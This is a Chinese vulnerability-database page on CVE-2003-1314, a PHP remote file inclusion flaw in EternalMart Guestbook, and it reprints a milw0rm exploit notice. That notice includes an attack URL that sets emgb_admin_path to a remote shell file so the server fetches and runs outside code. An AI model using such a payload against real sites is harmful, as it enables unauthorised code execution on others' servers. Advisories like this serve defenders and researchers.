CVE-2003-1314
CVSS7.5
发布时间 :2003-12-31 00:00:00
修订时间 :2011-03-07 21:14:03
NMCOE    

[原文]PHP remote file inclusion vulnerability in admin/auth.php in EternalMart Guestbook (EMGB) 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the emgb_admin_path parameter.


[CNNVD]EternalMart多个文件包含漏洞(CNNVD-200312-160)

        
        EternalMart包含邮件列表管理和客户留言本系统。
        EternalMart没有正确处理用户提交的请求,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
        EternalMart邮件管理程序对用户提交的$emml_path变量缺少充分过滤,可导致远程攻击者提交恶意数据给$emml_path,包含攻击者指定的远程服务器上文件,以WEB权限在系统内执行任意PHP代码。
        另外EternalMart客户留言系统上对$emgb_admin_path变量也缺少过滤,同样存在上述问题。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1314
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1314
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-160
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/8767
(UNKNOWN)  BID  8767
http://www.securityfocus.com/bid/21720
(UNKNOWN)  BID  21720
http://www.securityfocus.com/archive/1/340244
(UNKNOWN)  VULNWATCH  20031004 EMML, EMGB : Include() hole
http://securitytracker.com/id?1007885
(UNKNOWN)  SECTRACK  1007885
http://milw0rm.com/exploits/2980
(UNKNOWN)  MILW0RM  2980

- 漏洞信息

EternalMart多个文件包含漏洞
高危 输入验证
2003-12-31 00:00:00 2006-12-28 00:00:00
远程  
        
        EternalMart包含邮件列表管理和客户留言本系统。
        EternalMart没有正确处理用户提交的请求,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
        EternalMart邮件管理程序对用户提交的$emml_path变量缺少充分过滤,可导致远程攻击者提交恶意数据给$emml_path,包含攻击者指定的远程服务器上文件,以WEB权限在系统内执行任意PHP代码。
        另外EternalMart客户留言系统上对$emgb_admin_path变量也缺少过滤,同样存在上述问题。
        

- 公告与补丁

        厂商补丁:
        EternalMart
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.eternalmart.com

- 漏洞信息 (2980)

EternalMart Guestbook 1.10 (admin/auth.php) Remote Inclusion Vuln (EDBID:2980)
php webapps
2006-12-22 Verified
0 mdx
N/A [点击下载]
******************************************************************************************************
*EternalMart Guestbook 1.1.0********* [emgb_admin_path] ************************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
*******************************************
+Author : mdx                             *
*****************************************************************************
+Files :
+admin/auth.php?                                                            *
*****************************************************************************
+code  :                                                                    *
+                                                                           *
+      include("$emgb_admin_path/auth_func.php");                           *
+                                                                           *
+      download link :  http://www.vanta.ru/script/info.php?id=230&clas=0   *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/admin/auth.php?emgb_admin_path=http://mdxshell.txt?  +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?              Hi , The_bat_hacker , How are you ? ;=)                                       *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.
*******************                                                                          *
**********************************************************************************************

# milw0rm.com [2006-12-22]
		

- 漏洞信息

2260
EternalMart Guestbook Inclusion of Arbitrary Files
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-10-07 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站